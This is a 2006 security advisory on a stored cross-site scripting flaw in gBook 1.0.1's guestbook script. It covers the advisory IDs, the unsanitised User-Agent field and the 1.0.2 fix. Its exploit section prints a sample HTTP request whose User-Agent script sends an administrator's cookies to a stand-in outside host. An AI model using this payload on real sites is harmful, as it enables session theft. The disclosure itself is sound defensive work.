Further info about XSS vulnerability (fixed in gBook 1.0.2)
This document is copyright (c) 2006 M. Kristall and may be used under the terms
of the GNU Free Documentation License (FDL). Copies of the FDL are available at
<http://www.gnu.org/copyleft/fdl.html>.

IDs
Bugtraq 14725
SA16668
ISS X-Force 22114
CVE-2005-4727
ADV-2005-1617

Updated:
9 July 2006

Vulnerable:
gBook 1.0.1
gBook 1.0.0*

* gBook 1.0.0 is vulnerable but unaffected.

Mentions:
This vulnerability was originally mentioned in the gBook 1.0.2 ChangeLog file.
The (known) reports of this vulnerability are:
	"Removed a couple XSS vulnerabilities" (ChangeLog)
	<http://sourceforge.net/project/shownotes.php?release_id=353531>

	"Input Validation Error" (SecurityFocus)
	<http://www.securityfocus.com/bid/14725>

	"gBook Unspecified Cross-Site Scripting Vulnerabilities" (Secunia)
	<http://secunia.com/advisories/16668/>

	"GBook Multiple Cross-Site Scripting" (US-CERT)
	<http://www.us-cert.gov/cas/bulletins/SB05-250.html#gbook>

	"Multiple cross site scripting vulnerability" (FrSIRT)
	<http://www.frsirt.com/english/advisories/2005/1617>

	"gBook Multiple Unspecified XSS" (OSVDB)
	<http://www.osvdb.org/19144>

	"Unspecified Cross-Site Scripting" (Critical Watch)
		<http://www.criticalwatch.com/resources/vulnerability/viewvulnerability.aspx?ExposureID=11820>
	(Much of the information provided there is inaccurate.)

	"Multiple Unspecified Cross Site Scripting" (Hackers Center)
	<http://www.hackerscenter.com/archive/view.asp?id=17853>

	"gbook HTTP POST User-Agent cross-site scripting" (ISS)
	<http://xforce.iss.net/xforce/xfdb/22114>

	"Cross-side scripting vulnerability in gbook.cgi" (CVE)
	<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4727>


Description:
Specially crafted HTTP "User-Agent" headers can cause deferred execution of
arbitrary JavaScript code by administrators.


Detailed Info:
The User-Agent header is stored without sanitization and no post-processing of
this entry field occurs. A user aware of this vulnerability might spoof his/her
User-Agent when adding a new entry. When an administrator logs in and goes to
the "Manage Entries" page, s/he executes specified code.


Description of Fix:
As of gBook 1.0.2, the User-Agent header is treated as a form field. All
characters that could have a special meaning in HTML are converted to the
corresponding SGML encoding.


Detailed Description:
On line 569 of gbook.cgi (read_entries), a new field for the entries file is
generated from form fields and environment variables.

gBook 1.0.2 fixes this bug by doing the equivalent of changing line 560 to
sgmlize (@_POST{qw/name aim icq msn yim email www post/}, $ENV{'HTTP_USER_AGENT'});

(That is a shortened version of the actual code that is used. In gbook.cgi for
version 1.0.2, the actual line number is 519 due to code reorganization.)


Exploit:
An actual HTTP request exploiting this vulnerability might look like:
POST /path/to/gbook.cgi HTTP/1.1\r\n
Host: www.example.com\r\n
User-Agent: <script>document.location="http://some.other.site/cookie.harvester?"+document.cookie;</script>\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Referer: http://www.example.com/path/to/gbook.cgi/add.html\r\n
Content-Length: 82\r\n
\r\n
name=Your Name&aim=&icq=&msn=&yim=&email=email@address.host&www=&post=Some message


Warning:
gBook 1.0.2 is not immune to entries files containing bad fields. If bad fields
were created by earlier versions of gBook, gBook 1.0.2 will be as susceptible as
any other version of gBook. This may change in a newer version.